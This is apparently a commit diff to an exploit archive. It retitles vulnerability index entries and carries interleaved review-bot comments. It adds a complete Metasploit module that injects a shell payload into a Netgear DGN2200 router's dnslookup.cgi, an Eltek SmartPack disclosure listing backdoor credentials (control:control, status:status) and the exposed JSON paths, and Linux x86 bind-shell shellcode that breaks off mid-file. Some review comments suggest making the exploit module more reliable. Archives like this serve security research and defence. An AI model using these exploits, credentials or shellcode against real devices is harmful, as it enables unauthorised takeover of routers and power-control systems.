+1961,platforms/php/webapps/1961.txt,"XOOPS myAds Module - 'lid' SQL Injection",2006-06-28,KeyCoder,php,webapps,0
 1963,platforms/php/webapps/1963.txt,"GeekLog 1.4.0sr3 - (_CONF[path]) Remote File Inclusion",2006-06-29,Kw3[R]Ln,php,webapps,0
 1964,platforms/php/webapps/1964.php,"GeekLog 1.4.0sr3 - 'f(u)ckeditor' Remote Code Execution",2006-06-29,rgod,php,webapps,0
 1968,platforms/php/webapps/1968.php,"DZCP (deV!L_z Clanportal) 1.34 - 'id' SQL Injection",2006-07-01,x128,php,webapps,0
@@ -17547,7 +17556,7 @@ id,file,description,date,author,platform,type,port
 2944,platforms/php/webapps/2944.txt,"VerliAdmin 0.3 - 'index.php' Remote File Inclusion",2006-12-18,Kacper,php,webapps,0
 2945,platforms/php/webapps/2945.txt,"Uploader & Downloader 3.0 - (id_user) SQL Injection",2006-12-18,"the master",php,webapps,0
 2948,platforms/php/webapps/2948.txt,"RateMe 1.3.2 - 'main.inc.php' Remote File Inclusion",2006-12-18,"Al7ejaz Hacker",php,webapps,0
-2953,platforms/php/webapps/2953.php,"PHP-Update 2.7 - extract() Authentication Bypass / Shell Inject Exploit",2006-12-19,rgod,php,webapps,0
+2953,platforms/php/webapps/2953.php,"PHP-Update 2.7 - 'extract()' Authentication Bypass / Shell Inject Exploit",2006-12-19,rgod,php,webapps,0
 2955,platforms/php/webapps/2955.txt,"Paristemi 0.8.3b - 'buycd.php' Remote File Inclusion",2006-12-19,nuffsaid,php,webapps,0
 2956,platforms/php/webapps/2956.txt,"phpProfiles 3.1.2b - Multiple Remote File Inclusion",2006-12-19,nuffsaid,php,webapps,0
 2957,platforms/php/webapps/2957.txt,"PHPFanBase 2.x - 'protection.php' Remote File Inclusion",2006-12-19,"Cold Zero",php,webapps,0
@@ -23042,7 +23051,7 @@ id,file,description,date,author,platform,type,port
 11631,platforms/php/webapps/11631.txt,"PHP-Nuke - user.php SQL Injection",2010-03-04,"Easy Laster",php,webapps,0
 11634,platforms/hardware/webapps/11634.pl,"Sagem Routers - Remote Authentication Bypass",2010-03-04,AlpHaNiX,hardware,webapps,0
 11635,platforms/php/webapps/11635.pl,"OneCMS 2.5 - SQL Injection",2010-03-05,"Ctacok and .:[melkiy]:",php,webapps,0
-11636,platforms/php/webapps/11636.php,"Kolang - proc_open PHP safe mode Bypass 4.3.10 - 5.3.0 Exploit",2010-03-05,"Hamid Ebadi",php,webapps,0
+11636,platforms/php/webapps/11636.php,"Kolang 4.3.10 < 5.3.0 - 'proc_open()' PHP 'safe_mode' Bypass Exploit",2010-03-05,"Hamid Ebadi",php,webapps,0
 11637,platforms/php/webapps/11637.txt,"Auktionshaus 3.0.0.1 - 'news.php' 'id' SQL Injection",2010-03-05,"Easy Laster",php,webapps,0
 11638,platforms/php/webapps/11638.txt,"E-topbiz Link ADS 1 PHP script - (linkid) Blind SQL Injection",2010-03-05,JosS,php,webapps,0
 11641,platforms/php/webapps/11641.txt,"PHPCOIN 1.2.1 - 'mod.php' Local File Inclusion",2010-03-06,_mlk_,php,webapps,0
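Review bot: The rewritten 11636 title, `Kolang 4.3.10 < 5.3.0 - 'proc_open()' PHP 'safe_mode' Bypass Exploit`, attaches the version range to Kolang, but on the removed line the range `4.3.10 - 5.3.0` sits next to `PHP safe mode Bypass`, which reads as the affected PHP versions rather than a Kolang version; the exploit file would confirm which. `4.3.10 < 5.3.0` is also not the range notation used elsewhere in this commit (compare `PHP 5.3.x < 5.3.2` on the 33988 line). If the range is PHP's, a form such as `Kolang - PHP 4.3.10 < 5.3.0 'proc_open()' 'safe_mode' Bypass Exploit` keeps the version with the product it describes.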
@@ -24505,8 +24514,8 @@ id,file,description,date,author,platform,type,port
 15199,platforms/asp/webapps/15199.py,"Cilem Haber 1.4.4 (Tr) - Database Disclosure (Python)",2010-10-04,ZoRLu,asp,webapps,0
 15183,platforms/asp/webapps/15183.py,"Bka Haber 1.0 (Tr) - File Disclosure",2010-10-02,ZoRLu,asp,webapps,0
 15177,platforms/php/webapps/15177.pl,"iGaming CMS 1.5 - Blind SQL Injection",2010-10-01,plucky,php,webapps,0
-15185,platforms/asp/webapps/15185.txt,"SmarterMail 7.x (7.2.3925) - Persistent Cross-Site Scripting",2010-10-02,sqlhacker,asp,webapps,0
-15189,platforms/asp/webapps/15189.txt,"SmarterMail 7.x (7.2.3925) - LDAP Injection",2010-10-02,sqlhacker,asp,webapps,0
+15185,platforms/asp/webapps/15185.txt,"SmarterMail < 7.2.3925 - Persistent Cross-Site Scripting",2010-10-02,sqlhacker,asp,webapps,0
+15189,platforms/asp/webapps/15189.txt,"SmarterMail < 7.2.3925 - LDAP Injection",2010-10-02,sqlhacker,asp,webapps,0
 15191,platforms/asp/webapps/15191.txt,"TradeMC E-Ticaret - SQL Injection / Cross-Site Scripting",2010-10-02,KnocKout,asp,webapps,0
 15194,platforms/php/webapps/15194.txt,"TinyMCE MCFileManager 2.1.2 - Arbitrary File Upload",2010-10-03,Hackeri-AL,php,webapps,0
 15200,platforms/php/webapps/15200.txt,"FAQMasterFlex 1.2 - SQL Injection",2010-10-04,cyb3r.anbu,php,webapps,0
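Review bot: The 15185 and 15189 retitles change the affected-version claim, not just its formatting: the removed lines say build `7.2.3925` of the 7.x line is affected, while `SmarterMail < 7.2.3925` says versions before that build are affected and implies 7.2.3925 itself is fixed. Nothing in the commit record shows that this was verified against the advisories, and the other retitles in this change are presentational. Unless the build is known to be the fix, `SmarterMail 7.2.3925 - Persistent Cross-Site Scripting` and `SmarterMail 7.2.3925 - LDAP Injection` preserve the original statement; if it is the fix, the same `<` convention used on the 33988 and 41996 lines applies and a note in the commit message would help.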
@@ -24782,7 +24791,7 @@ id,file,description,date,author,platform,type,port
 15777,platforms/asp/webapps/15777.txt,"Oto Galery 1.0 - Multiple SQL Injections",2010-12-19,"DeadLy DeMon",asp,webapps,0
 15779,platforms/php/webapps/15779.txt,"Joomla! Component JE Auto - Local File Inclusion",2010-12-19,Sid3^effects,php,webapps,0
 15781,platforms/php/webapps/15781.txt,"Inout Webmail Script - Persistent Cross-Site Scripting",2010-12-20,Sid3^effects,php,webapps,0
-15783,platforms/php/webapps/15783.txt,"MaticMarket 2.02 for PHP-Nuke - Local File Inclusion",2010-12-20,xer0x,php,webapps,0
+15783,platforms/php/webapps/15783.txt,"PHP-Nuke MaticMarket 2.02 - Local File Inclusion",2010-12-20,xer0x,php,webapps,0
 15784,platforms/asp/webapps/15784.txt,"Elcom CommunityManager.NET - Authentication Bypass",2010-12-20,"Sense of Security",asp,webapps,0
 15789,platforms/php/webapps/15789.txt,"plx Ad Trader 3.2 - Authentication Bypass",2010-12-20,R4dc0re,php,webapps,0
 15790,platforms/php/webapps/15790.txt,"PHP Web Scripts Ad Manager Pro 3.0 - SQL Injection",2010-12-20,R4dc0re,php,webapps,0
@@ -25819,7 +25828,7 @@ id,file,description,date,author,platform,type,port
 18686,platforms/php/webapps/18686.txt,"SyndeoCMS 3.0.01 - Persistent Cross-Site Scripting",2012-03-30,"Ivano Binetti",php,webapps,0
 18687,platforms/php/webapps/18687.txt,"Landshop 0.9.2 - Multiple Web Vulnerabilities",2012-03-31,Vulnerability-Lab,php,webapps,0
 18689,platforms/php/webapps/18689.txt,"Woltlab Burning Board 2.2 / 2.3 - [WN]KT KickTipp 3.1 - SQL Injection",2012-03-31,"Easy Laster",php,webapps,0
-18690,platforms/php/webapps/18690.txt,"WordPress Plugin BuddyPress plugin 1.5.x < 1.5.5 - SQL Injection",2012-03-31,"Ivan Terkin",php,webapps,0
+18690,platforms/php/webapps/18690.txt,"WordPress Plugin BuddyPress Plugin 1.5.x < 1.5.5 - SQL Injection",2012-03-31,"Ivan Terkin",php,webapps,0
 18694,platforms/php/webapps/18694.txt,"Simple PHP Agenda 2.2.8 - Cross-Site Request Forgery (Add Admin / Add Event)",2012-04-03,"Ivano Binetti",php,webapps,0
 18708,platforms/php/webapps/18708.txt,"GENU CMS - SQL Injection",2012-04-05,"hordcode security",php,webapps,0
 18711,platforms/php/webapps/18711.txt,"w-CMS 2.0.1 - Multiple Vulnerabilities",2012-04-06,Black-ID,php,webapps,0
@@ -28732,7 +28741,7 @@ id,file,description,date,author,platform,type,port
 26425,platforms/php/webapps/26425.pl,"Woltlab 1.1/2.x - 'Info-DB Info_db.php' Multiple SQL Injections",2005-10-26,admin@batznet.com,php,webapps,0
 26426,platforms/asp/webapps/26426.html,"Techno Dreams Multiple Scripts - Multiple SQL Injections",2005-10-26,"farhad koosha",asp,webapps,0
 26427,platforms/php/webapps/26427.txt,"GCards 1.43 - 'news.php' SQL Injection",2005-10-26,svsecurity,php,webapps,0
-26428,platforms/php/webapps/26428.html,"Search Enhanced Module 1.1/2.0 for PHP-Nuke - HTML Injection",2005-10-26,bhfh01,php,webapps,0
+26428,platforms/php/webapps/26428.html,"PHP-Nuke Search Enhanced Module 1.1/2.0 - HTML Injection",2005-10-26,bhfh01,php,webapps,0
 26429,platforms/asp/webapps/26429.txt,"Novell ZENworks Patch Management 6.0.52 - computers/default.asp Direction Parameter SQL Injection",2005-10-27,"Dennis Rand",asp,webapps,0
 26430,platforms/asp/webapps/26430.txt,"Novell ZENworks Patch Management 6.0.52 - reports/default.asp Multiple Parameter SQL Injection",2005-10-27,"Dennis Rand",asp,webapps,0
 26431,platforms/php/webapps/26431.txt,"ATutor 1.x - 'forum.inc.php' Arbitrary Command Execution",2005-10-27,"Andreas Sandblad",php,webapps,0
@@ -31030,7 +31039,7 @@ id,file,description,date,author,platform,type,port
 30050,platforms/php/webapps/30050.html,"WordPress Theme Redoable 1.2 - header.php s Parameter Cross-Site Scripting",2007-05-17,"John Martinelli",php,webapps,0
 30051,platforms/php/webapps/30051.txt,"PsychoStats 2.3 - 'Server.php' Full Path Disclosure",2007-05-17,kefka,php,webapps,0
 30053,platforms/php/webapps/30053.txt,"ClientExec 3.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,r0t,php,webapps,0
-30054,platforms/jsp/webapps/30054.txt,"SonicWALL Gms 7.x - Filter Bypass & Persistent Exploit",2013-12-05,Vulnerability-Lab,jsp,webapps,0
+30054,platforms/jsp/webapps/30054.txt,"SonicWALL Gms 7.x - Filter Bypass / Persistent Exploit",2013-12-05,Vulnerability-Lab,jsp,webapps,0
 30055,platforms/ios/webapps/30055.txt,"Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities",2013-12-05,Vulnerability-Lab,ios,webapps,0
 30201,platforms/php/webapps/30201.txt,"Fuzzylime 1.0 - Low.php Cross-Site Scripting",2007-06-18,RMx,php,webapps,0
 30156,platforms/cgi/webapps/30156.txt,"CGILua 3.0 - SQL Injection",2013-12-09,"aceeeeeeeer .",cgi,webapps,0
@@ -33166,7 +33175,7 @@ id,file,description,date,author,platform,type,port
 32969,platforms/php/webapps/32969.txt,"IceWarp Merak Mail Server 9.4.1 - 'cleanHTML()' Function Cross-Site Scripting",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0
 32973,platforms/hardware/webapps/32973.txt,"Sixnet Sixview 2.4.1 - Web Console Directory Traversal",2014-04-22,"daniel svartman",hardware,webapps,0
 32976,platforms/php/webapps/32976.php,"No-CMS 0.6.6 rev 1 - Admin Account Hijacking / Remote Code Execution via Static Encryption Key",2014-04-22,"Mehmet Ince",php,webapps,0
-34148,platforms/multiple/webapps/34148.txt,"Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent Exploit",2014-07-23,Vulnerability-Lab,multiple,webapps,0
+34148,platforms/multiple/webapps/34148.txt,"Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass / Persistent Exploit",2014-07-23,Vulnerability-Lab,multiple,webapps,0
 32983,platforms/php/webapps/32983.txt,"kitForm CRM Extension 0.43 - 'sorter.ph' 'sorter_value' Parameter SQL Injection",2014-04-22,chapp,php,webapps,80
 32985,platforms/php/webapps/32985.xml,"IceWarp Merak Mail Server 9.4.1 - 'item.php' Cross-Site Scripting",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0
 32986,platforms/php/webapps/32986.py,"IceWarp Merak Mail Server 9.4.1 - 'Forgot Password' Input Validation",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0
@@ -34420,7 +34429,7 @@ id,file,description,date,author,platform,type,port
 35142,platforms/php/webapps/35142.txt,"Social Share - 'search' Parameter Cross-Site Scripting",2010-12-23,"Aliaksandr Hartsuyeu",php,webapps,0
 35143,platforms/php/webapps/35143.txt,"HotWeb Scripts HotWeb Rentals - 'PageId' Parameter SQL Injection",2010-12-28,"non customers",php,webapps,0
 35145,platforms/php/webapps/35145.txt,"Pligg CMS 1.1.3 - 'range' Parameter SQL Injection",2010-12-27,Dr.NeT,php,webapps,0
-35146,platforms/php/webapps/35146.txt,"PHP < 5.6.2 - Bypass disable_functions Exploit (Shellshock)",2014-11-03,"Ryan King (Starfall)",php,webapps,0
+35146,platforms/php/webapps/35146.txt,"PHP < 5.6.2 - 'disable_functions()' Bypass Exploit (Shellshock)",2014-11-03,"Ryan King (Starfall)",php,webapps,0
 35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 - 'Track' Module 'server.php' Cross-Site Scripting",2010-12-27,"Ulisses Castro",php,webapps,0
 35150,platforms/php/webapps/35150.php,"Drupal < 7.32 - Unauthenticated SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443
 35155,platforms/php/webapps/35155.txt,"CruxCMS 3.0 - Multiple Input Validation Vulnerabilities",2010-12-26,ToXiC,php,webapps,0
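Review bot: The 35146 retitle turns `disable_functions` into `'disable_functions()'`, but `disable_functions` is a php.ini configuration directive, not a callable, so the `()` makes the entry look like a function bypass and will not match searches for the directive name. The removed line had it right apart from quoting; `PHP < 5.6.2 - 'disable_functions' Bypass Exploit (Shellshock)` keeps the quoting convention this commit applies elsewhere without inventing a function. The same directive-versus-function distinction applies to the `Safe_Mode()` spelling on the 32693 line in an earlier hunk.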
@@ -35327,7 +35336,7 @@ id,file,description,date,author,platform,type,port
 36613,platforms/php/webapps/36613.txt,"WordPress Plugin Simple Ads Manager - Multiple SQL Injections",2015-04-02,"ITAS Team",php,webapps,80
 36614,platforms/php/webapps/36614.txt,"WordPress Plugin Simple Ads Manager 2.5.94 - Arbitrary File Upload",2015-04-02,"ITAS Team",php,webapps,80
 36615,platforms/php/webapps/36615.txt,"WordPress Plugin Simple Ads Manager - Information Disclosure",2015-04-02,"ITAS Team",php,webapps,80
-36616,platforms/php/webapps/36616.txt,"phpSFP - Schedule Facebook Posts 1.5.6 SQL Injection",2015-04-02,@u0x,php,webapps,80
+36616,platforms/php/webapps/36616.txt,"phpSFP Schedule Facebook Posts 1.5.6 - SQL Injection",2015-04-02,@u0x,php,webapps,80
 36617,platforms/php/webapps/36617.txt,"WordPress Plugin VideoWhisper Video Presentation 3.31.17 - Arbitrary File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80
 36618,platforms/php/webapps/36618.txt,"WordPress Plugin VideoWhisper Video Conference Integration 4.91.8 - Arbitrary File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80
 36619,platforms/linux/webapps/36619.txt,"Ericsson Drutt MSDP (Instance Monitor) - Directory Traversal",2015-04-02,"Anastasios Monachos",linux,webapps,0
@@ -35775,7 +35784,7 @@ id,file,description,date,author,platform,type,port
 37309,platforms/php/webapps/37309.txt,"phpCollab 2.5 - Database Backup Information Disclosure",2012-05-23,"team ' and 1=1--",php,webapps,0
 37310,platforms/php/webapps/37310.txt,"Ajaxmint Gallery 1.0 - Local File Inclusion",2012-05-23,AkaStep,php,webapps,0
 37311,platforms/php/webapps/37311.txt,"Pligg CMS 1.x - 'module.php' Multiple Parameter Cross-Site Scripting",2012-05-23,"High-Tech Bridge SA",php,webapps,0
-37312,platforms/php/webapps/37312.txt,"pragmaMx 1.12.1 - modules.php URI Cross-Site Scripting",2012-05-23,"High-Tech Bridge SA",php,webapps,0
+37312,platforms/php/webapps/37312.txt,"pragmaMx 1.12.1 - 'modules.php' URI Cross-Site Scripting",2012-05-23,"High-Tech Bridge SA",php,webapps,0
 37313,platforms/php/webapps/37313.txt,"pragmaMx 1.12.1 - includes/wysiwyg/spaw/editor/plugins/imgpopup/img_popup.php img_url Parameter Cross-Site Scripting",2012-05-23,"High-Tech Bridge SA",php,webapps,0
 37314,platforms/php/webapps/37314.txt,"Yellow Duck Framework 2.0 Beta1 - Local File Disclosure",2012-05-23,L3b-r1'z,php,webapps,0
 37315,platforms/php/webapps/37315.txt,"PHPCollab 2.5 - 'uploadfile.php' Crafted Request Arbitrary Non-PHP File Upload",2012-05-24,"team ' and 1=1--",php,webapps,0
@@ -36794,7 +36803,7 @@ id,file,description,date,author,platform,type,port
 39179,platforms/php/webapps/39179.txt,"CMS Touch - 'news.php' News_ID Parameter SQL Injection",2014-05-08,indoushka,php,webapps,0
 39184,platforms/hardware/webapps/39184.txt,"MediaAccess TG788vn - Unauthenticated File Disclosure",2016-01-06,0x4148,hardware,webapps,0
 39187,platforms/asp/webapps/39187.txt,"CIS Manager - 'email' Parameter SQL Injection",2014-05-16,Edge,asp,webapps,0
-39188,platforms/php/webapps/39188.txt,"Glossaire Module for XOOPS - '/modules/glossaire/glossaire-aff.php' SQL Injection",2014-05-19,AtT4CKxT3rR0r1ST,php,webapps,0
+39188,platforms/php/webapps/39188.txt,"XOOPS Glossaire Module- '/modules/glossaire/glossaire-aff.php' SQL Injection",2014-05-19,AtT4CKxT3rR0r1ST,php,webapps,0
 39189,platforms/php/webapps/39189.txt,"Softmatica SMART iPBX - Multiple SQL Injections",2014-05-19,AtT4CKxT3rR0r1ST,php,webapps,0
 39190,platforms/php/webapps/39190.php,"WordPress Plugin cnhk-Slideshow - Arbitrary File Upload",2014-05-18,"Ashiyane Digital Security Team",php,webapps,0
 39191,platforms/php/webapps/39191.txt,"Clipperz Password Manager - 'backend/PHP/src/setup/rpc.php' Remote Code Execution",2014-05-20,"Manish Tanwar",php,webapps,0
@@ -36946,7 +36955,7 @@ id,file,description,date,author,platform,type,port
 39507,platforms/php/webapps/39507.txt,"WordPress Plugin More Fields 2.1 - Cross-Site Request Forgery",2016-02-29,"Aatif Shahdad",php,webapps,80
 39513,platforms/php/webapps/39513.txt,"WordPress Plugin CP Polls 1.0.8 - Multiple Vulnerabilities",2016-03-01,"i0akiN SEC-LABORATORY",php,webapps,80
 39521,platforms/php/webapps/39521.txt,"WordPress Plugin Bulk Delete 5.5.3 - Privilege Escalation",2016-03-03,"Panagiotis Vagenas",php,webapps,80
-39524,platforms/php/webapps/39524.js,"ATutor LMS - install_modules.php Cross-Site Request Forgery / Remote Code Execution",2016-03-07,mr_me,php,webapps,0
+39524,platforms/php/webapps/39524.js,"ATutor LMS - 'install_modules.php' Cross-Site Request Forgery / Remote Code Execution",2016-03-07,mr_me,php,webapps,0
 39526,platforms/php/webapps/39526.sh,"Cerberus Helpdesk (Cerb5) 5 < 6.7 - Password Hash Disclosure",2016-03-07,asdizzle_,php,webapps,80
 39534,platforms/php/webapps/39534.html,"Bluethrust Clan Scripts v4 R17 - Multiple Vulnerabilities",2016-03-09,"Brandon Murphy",php,webapps,80
 39536,platforms/php/webapps/39536.txt,"WordPress Theme SiteMile Project 2.0.9.5 - Multiple Vulnerabilities",2016-03-09,"LSE Leading Security Experts GmbH",php,webapps,80
@@ -37166,7 +37175,7 @@ id,file,description,date,author,platform,type,port
 40106,platforms/windows/webapps/40106.txt,"GSX Analyzer 10.12 / 11 - 'main.swf' Hard-Coded Superadmin Credentials",2016-07-13,ndevnull,windows,webapps,0
 40109,platforms/xml/webapps/40109.txt,"Apache Archiva 1.3.9 - Multiple Cross-Site Request Forgery Vulnerabilities",2016-07-13,"Julien Ahrens",xml,webapps,0
 40112,platforms/cgi/webapps/40112.txt,"Clear Voyager Hotspot IMW-C910W - Arbitrary File Disclosure",2016-07-15,Damaster,cgi,webapps,80
-40114,platforms/php/webapps/40114.py,"vBulletin 5.x/4.x - Authenticated Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API",2014-10-12,tintinweb,php,webapps,0
+40114,platforms/php/webapps/40114.py,"vBulletin 4.x/5.x - Authenticated Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API",2014-10-12,tintinweb,php,webapps,0
 40115,platforms/php/webapps/40115.py,"vBulletin 4.x - Authenticated SQL Injection in breadcrumbs via xmlrpc API",2014-10-12,tintinweb,php,webapps,0
 40193,platforms/php/webapps/40193.txt,"Open Upload 0.4.2 - Cross-Site Request Forgery (Add Admin)",2016-08-02,"Vinesh Redkar",php,webapps,80
 40171,platforms/linux/webapps/40171.txt,"AXIS Multiple Products - 'devtools ' Authenticated Remote Command Execution",2016-07-29,Orwelllabs,linux,webapps,80
@@ -38071,3 +38080,4 @@ id,file,description,date,author,platform,type,port
 42197,platforms/hardware/webapps/42197.sh,"D-Link DSL-2640B - Unauthenticated Remote DNS Change",2017-06-18,"Todor Donev",hardware,webapps,0
 42205,platforms/php/webapps/42205.html,"WonderCMS 2.1.0 - Cross-Site Request Forgery",2017-06-19,"Ehsan Hosseini",php,webapps,0
 42221,platforms/php/webapps/42221.py,"PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution",2017-06-21,phackt_ul,php,webapps,0
+42252,platforms/hardware/webapps/42252.txt,"Eltek SmartPack - Backdoor Account",2017-06-26,"Saeed reza Zamanian",hardware,webapps,0
diff --git a/platforms/cgi/remote/42257.rb b/platforms/cgi/remote/42257.rb
new file mode 100755
index 000000000..b1f7e2729
--- /dev/null
+++ b/platforms/cgi/remote/42257.rb
@@ -0,0 +1,108 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'net/http' +require "base64" + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => "Netgear DGN2200 dnslookup.cgi Command Injection", + 'Description' => %q{ + This module exploits a command injection vulnerablity in NETGEAR + DGN2200v1/v2/v3/v4 routers by sending a specially crafted post request + with valid login details. + }, + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Author' => [ + 'thecarterb', # Metasploit Module + 'SivertPL' # Vuln discovery + ], + 'DefaultTarget' => 0, + 'Privileged' => true, + 'Arch' => [ARCH_CMD], + 'Targets' => [ + [ 'NETGEAR DDGN2200 Router', { } ] + ], + 'References' => + [ + [ 'EDB', '41459'], + [ 'CVE', '2017-6334'] + ], + 'DisclosureDate' => 'Feb 25 2017', + )) + + register_options( + [ + Opt::RPORT(80), + OptString.new('USERNAME', [true, 'Username to authenticate with', '']), + OptString.new('PASSWORD', [true, 'Password to authenticate with', '']) + ]) + + register_advanced_options( + [ + OptString.new('HOSTNAME', [true, '"Hostname" to look up (doesn\'t really do anything important)', 'www.google.com']) + ]) + end + + # Requests the login page which tells us the hardware version + def check + res = send_request_cgi({'uri'=>'/'}) + if res.nil? 
+ fail_with(Failure::Unreachable, 'Connection timed out.') + end + # Checks for the `WWW-Authenticate` header in the response + if res.headers["WWW-Authenticate"] + data = res.to_s + marker_one = "Basic realm=\"NETGEAR " + marker_two = "\"" + model = data[/#{marker_one}(.*?)#{marker_two}/m, 1] + vprint_status("Router is a NETGEAR router (#{model})") + model_numbers = ['DGN2200v1', 'DGN2200v2', 'DGN2200v3', 'DGN2200v4'] + if model_numbers.include?(model) + print_good("Router may be vulnerable (NETGEAR #{model})") + return CheckCode::Detected + else + return CheckCode::Safe + end + else + print_error('Router is not a NETGEAR router') + return CheckCode::Safe + end + end + + def exploit + check + + # Convert datastores + user = datastore['USERNAME'] + pass = datastore['PASSWORD'] + hostname = datastore['HOSTNAME'] + + vprint_status("Using encoder: #{payload.encoder} ") + print_status('Sending payload...') + + vprint_status("Attempting to authenticate with: #{user}:#{pass} (b64 encoded for auth)") + + creds_combined = Base64.strict_encode64("#{user}:#{pass}") + vprint_status("Encoded authentication: #{creds_combined}") + + res = send_request_cgi({ + 'uri' => '/dnslookup.cgi', + 'headers' => { + 'Authorization' => "Basic #{creds_combined}" + }, + 'vars_post' => { + 'lookup' => 'Lookup', + 'host_name' => hostname + '; ' + payload.encoded + }}) + + end +end \ No newline at end of file diff --git a/platforms/hardware/webapps/42252.txt b/platforms/hardware/webapps/42252.txt new file mode 100755 index 000000000..da18d2b69 --- /dev/null +++ b/platforms/hardware/webapps/42252.txt 
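Review bot: `exploit` calls `check` on its first line but discards the CheckCode, so a `CheckCode::Safe` result (a non-NETGEAR realm, or a model not in `model_numbers`) does not stop the module from sending the request; the usual guard is `fail_with(Failure::NotVulnerable, 'Target does not look like a DGN2200') unless check == CheckCode::Detected`. The `res` returned by the final `send_request_cgi` is assigned but never inspected, so neither a nil response nor a non-200 status is reported to the operator. Two smaller points of style: `marker_one` is interpolated into the regex in `check` without `Regexp.escape`, and `require 'net/http'` is unused because every request goes through the HttpClient mixin.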
@@ -0,0 +1,86 @@ +Eltek SmartPack - Backdoor Account + +Author: Saeed reza Zamanian [penetrationtest @ Linkedin] +Product: Eltek SmartPack +Vendor: http://www.eltek.com/ +Product Link : http://www.eltek.com/detail_products.epl?k1=25507&id=1123846 + +About Product: + +The Smartpack controller is a powerful and cost-effective module, developed for monitoring and controlling a wide range of Elte's DC power supply systems. +You operate the system from the front panel, locally via a PC using the PowerSuite PC application, or remotely via modem, Ethernet and the Web. The module then utilizes the USB- or RS-232 ports to interface with a local PC, SNMP or Web adapters. + +Vulnerability Report: +In Eltek Management Section, on following path, some json files (sush as cfgUseraccount1.json to cfgUseraccount10.json) will be called , that disclose some of pre-defined system users. +the json response is containing username and password (hashed in MD5), if you crack the MD5 hashes to plain text you can be able to login in the system. (same as bellow). +Please Note: the users were not note in users manual. + +control:control +status:status + +Path: +system conf>Devuce Settings>User Accounts +----------------------------- +json Path: +http://10.211.7.70/RPC/Eltek/cfgUseraccount1.json +to ..... 
+http://10.211.7.70/RPC/Eltek/cfgUseraccount10.json +----------------------------- +json responses: + +{ + "jsonrpc": "2.0", + "result": [{ + "Path": "SystemType_ControlSystem.1.ControlUnitPart_security.0.Object_user.UserId_cfgLevel:vU8int1" +, + "Value": 2 + }, { + "Path": "SystemType_ControlSystem.1.ControlUnitPart_security.0.Object_user.UserId_cfgUser:vString21" +, + "Value": "control" + }, { + "Path": "SystemType_ControlSystem.1.ControlUnitPart_security.0.Object_user.UserId_cfgPassword:vString21" +, + "Value": "fc5364bf9dbfa34954526becad136d4b" + }, { + "Path": "SystemType_ControlSystem.1.ControlUnitPart_security.0.Object_user.UserId_cfgPassword_new +:vString21", + "Value": null + }, { + "Path": "SystemType_ControlSystem.1.ControlUnitPart_security.0.Object_user.UserId_cfgPassword_renew +:vString21", + "Value": null + }], + "id": 21 + + +------------------------------------------------------------------------------------------- +{ + "jsonrpc": "2.0", + "result": [{ + "Path": "SystemType_ControlSystem.1.ControlUnitPart_security.0.Object_user.UserId_cfgLevel:vU8int1" +, + "Value": 1 + }, { + "Path": "SystemType_ControlSystem.1.ControlUnitPart_security.0.Object_user.UserId_cfgUser:vString21" +, + "Value": "status" + }, { + "Path": "SystemType_ControlSystem.1.ControlUnitPart_security.0.Object_user.UserId_cfgPassword:vString21" +, + "Value": "9acb44549b41563697bb490144ec6258" + }, { + "Path": "SystemType_ControlSystem.1.ControlUnitPart_security.0.Object_user.UserId_cfgPassword_new +:vString21", + "Value": null + }, { + "Path": "SystemType_ControlSystem.1.ControlUnitPart_security.0.Object_user.UserId_cfgPassword_renew +:vString21", + "Value": null + }], + "id": 8 +} + +------------------------------------------------------------------------------------------- + +#EOF \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/42254.c b/platforms/lin_x86/shellcode/42254.c new file mode 100755 index 000000000..18f997c5c --- /dev/null 
+++ b/platforms/lin_x86/shellcode/42254.c 
@@ -0,0 +1,98 @@ +/* + +Architecture : x86 +OS : Linux +Author : wetw0rk +ID : SLAE-958 +Shellcode Size : 75 bytes +Bind Port : 4444 +Description : A linux/x86 bind shell via /bin/sh. Created by analysing msfvenom; + original payload was 78 bytes and contained 1 NULL. My shellcode + is 75 and contains 0 NULLS ;). + +Original Metasploit Shellcode: + sudo msfvenom -p linux/x86/shell_bind_tcp -b "\x00" -f c --smallest -i 0 + +Test using: + gcc -fno-stack-protector -z execstack tshell.c + +SECTION .text + +global _start + +_start: + ; int socketcall(int call, unsigned long *args) remember to place backwards! + push 102 ; syscall for socketcall() 102 + pop eax ; POP 102 into EAX + cdq ; EDX = 0 (saves space) + push ebx ; PUSH EBX(0) onto stack (IPPROTO_IP = 0) + inc ebx ; INC-rement EBX by 1 + push ebx ; PUSH EBX(1) onto stack (SOCK_STREAM = 1) + push 2 ; PUSH 2 onto stack (AF_INET = 2) + mov ecx,esp ; top of stack contains our arguments save address in ECX + int 80h ; call that kernel!! + + ; int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen) + pop ebx ; POP stack(2 = SYS_BIND = bind()) into EBX + pop esi ; POP stack(1) into ESI we dont need it + push edx ; PUSH EDX(0) onto the stack (INADDR_ANY = 0) + push word 0x5c11 ; PUSH 0x5c11 onto the stack (PORT:4444) + push edx ; PUSH 00 onto the stack + push byte 0x02 ; PUSH 02 onto the stack (AF_INET = 2) + push 16 ; PUSH 16 onto the stack (ADDRLEN = 16) + push ecx ; PUSH ECX(struct pointer) onto the stack + push eax ; PUSH EAX(socket file descriptor) onto stack + mov ecx,esp ; top of stack contains our argument array save it in ECX + mov al,102 ; syscall for socketcall() 102 + int 80h ; call that kernel!! + + ; int listen(int sockfd, int backlog) + mov [ecx+4],eax ; zero out [ECX+4] + mov bl,4 ; MOV (4 = SYS_LISTEN = listen()) into BL 